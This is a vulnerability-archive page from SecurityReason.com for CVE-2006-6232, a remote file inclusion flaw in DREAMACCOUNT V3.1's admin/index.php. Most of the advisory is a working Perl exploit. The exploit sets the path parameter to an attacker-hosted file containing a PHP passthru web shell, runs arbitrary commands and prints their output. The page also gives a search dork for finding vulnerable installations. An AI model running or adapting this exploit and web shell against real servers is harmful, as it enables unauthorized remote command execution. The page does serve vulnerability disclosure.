SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

DREAMACCOUNT V3.1 Remote Command Execution Exploit


Arrow  SecurityAlert : 1949
Arrow  CVE : CVE-2006-6232
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : Drago84(Exclusive Security Team)
Arrow  Published : 05.12.2006

Arrow  Affected Software : DREAMACCOUNT V3.1



Arrow  Advisory Content :  

----------------------------------------------------

DREAMACCOUNT V3.1 Command Execution Exploit

----------------------------------------------------

Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)

Coded By Drago84(Exclusive Security Team)

----------------------------------------------------

site of script:http://dreamcost.com

----------------------------------------------------

Vulnerable: DREAMACCOUNT V3.1

----------------------------------------------------

vulnerable file :

------------------

/admin/index.php

----------------------------------------------------

vulnerable code:

----------------------------------------------------

require($path . "setup.php");

require($path . "functions.php");

require($path . "payment_processing.inc.php");

$path parameter File inclusion

----------------------------------------------------

#!/usr/bin/perl

use HTTP::Request;

use LWP::UserAgent;

print
"n=====================================================================
========rn";

print " * Dreamaccount Remote Command Execution 23/06/06 *rn";

print
"=======================================================================
======rn";

print "[*] dork:"powered by DreamAccount 3.1"n";

print "[*] Coded By : Drago84 n";

print "[*] Discovered by CrAsH_oVeR_rIdEn";

print "[*] Use <site> <dir_Dream> <eval site> <cmd>n";

print " Into the Eval Site it must be:nn";

print " Exclusive <?php passthru($_GET[cmd]); ?> /Exclusive";

if (@ARGV < 4)

{

print "nn[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>n";

print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/
http://www.site.org/doc.jpg idn";

print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) n";

exit();

}

my $dir=$ARGV[1];

my $host=$ARGV[0];

my $eval=$ARGV[2];

my $cmd=$ARGV[3];

my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;

print "n";

my $req=HTTP::Request->new(GET=>$url2);

my $ua=LWP::UserAgent->new();

$ua->timeout(10);

my $response=$ua->request($req);

if ($response->is_success) {

print "nnResult of:".$cmd."n";

my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)/Exclusive}smx
);

printf $1;

$response->content;

print "n";

}

------------------------------------------------------------------------
----------------------------

Discovered By CrAsh_oVeR_rIdE

Coded By Drago84

E-mail:KARKOR23 (at) hotmail (dot) com [email concealed]

Site:www.lezr.com

Greetz:KING-HACKER,YOUNG_HACKER

,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr
.hcR AND ALL LEZR.COM Member





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.